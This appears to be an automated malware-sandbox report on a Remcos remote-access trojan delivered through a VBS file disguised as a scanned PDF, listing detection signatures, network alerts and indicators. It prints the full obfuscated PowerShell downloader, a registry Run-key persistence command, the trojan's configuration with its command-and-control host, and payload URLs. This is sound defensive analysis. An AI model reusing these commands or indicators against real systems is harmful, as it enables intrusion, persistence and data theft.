              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7092, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", ProcessId: 7044, ProcessName: cmd.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", ProcessId: 7784, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');P

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: 7C 83 C8 BE 09 AB 22 9D 61 24 63 C2 51 AF C9 93 4A D0 6B C7 FE 66 07 B4 3E A1 E0 A7 85 6B 49 B5 53 A0 32 AE FE B5 37 83 9A C0 EF C4 01 F9 D6 23 59 E6 5E 11 DB 95 77 20 4E 7F 91 39 3B 40 84 5C , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7092, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-K8KWVT\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-21T17:07:56.585178+020020365941Malware Command and Control Activity Detected192.168.2.1149975193.187.91.21465253TCP
              2024-10-21T17:07:57.542508+020020365941Malware Command and Control Activity Detected192.168.2.1149976193.187.91.21453241TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-21T17:07:59.126300+020028033043Unknown Traffic192.168.2.1149977178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-21T17:07:53.024386+020028032702Potentially Bad Traffic192.168.2.1149973199.103.62.205443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["blackass.duckdns.org:65253:1", "blackass.duckdns.org:53241:1"], "Assigned name": "Rm", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-K8KWVT", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
              Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.11:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.11:49973 version: TLS 1.2
              Source: Binary string: cqm.Core.pdb source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1726800526.000000000796E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb* source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.1726800526.000000000796E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb^R source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49976 -> 193.187.91.214:53241
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49975 -> 193.187.91.214:65253
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: blackass.duckdns.org
              Source: Malware configuration extractorURLs: blackass.duckdns.org
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 193.187.91.214 ports 65253,2,3,53241,5,6
              Uses dynamic DNS services
              Source: unknownDNS query: name: blackass.duckdns.org
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: global trafficTCP traffic: 192.168.2.11:49975 -> 193.187.91.214:65253
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 199.103.62.205 199.103.62.205
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:49977 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49973 -> 199.103.62.205:443
              Source: global trafficHTTP traffic detected: GET /Mandschauvinisme.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.groupriam.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /PrOrl135.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.groupriam.comCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /Mandschauvinisme.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.groupriam.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /PrOrl135.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.groupriam.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: gormezl_6777.6777.6777.677e
              Source: global trafficDNS traffic detected: DNS query: www.groupriam.com
              Source: global trafficDNS traffic detected: DNS query: blackass.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: wscript.exe, 00000000.00000003.1350830060.0000018D175A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1352705520.0000018D175AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000002.1352705520.0000018D175AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E7F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://groupriam.com
              Source: powershell.exe, 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E61E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1703384031.0000000004F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E7F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.groupriam.com
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.1703384031.0000000004F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB_q
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E77A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1440004827.00000229E6407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bruta.pl/Mandschauvinisme.snp
              Source: powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E6DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.1473366610.00000229FE7EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsofd
              Source: powershell.exe, 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E6407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1440004827.00000229E7EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com
              Source: powershell.exe, 00000004.00000002.1440004827.00000229E77A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1440004827.00000229E6407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/Mandschauvinisme.snp
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.11:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.11:49973 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_7216.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7972, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7216, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.Jump to behavior
              Source: Scanned_22C-6e24090516030.pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6622
              Source: unknownProcess created: Commandline size = 6622
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6622Jump to behavior
              Source: amsi32_7216.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7972, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7216, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@16/10@4/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Sttefiskenes.TavJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
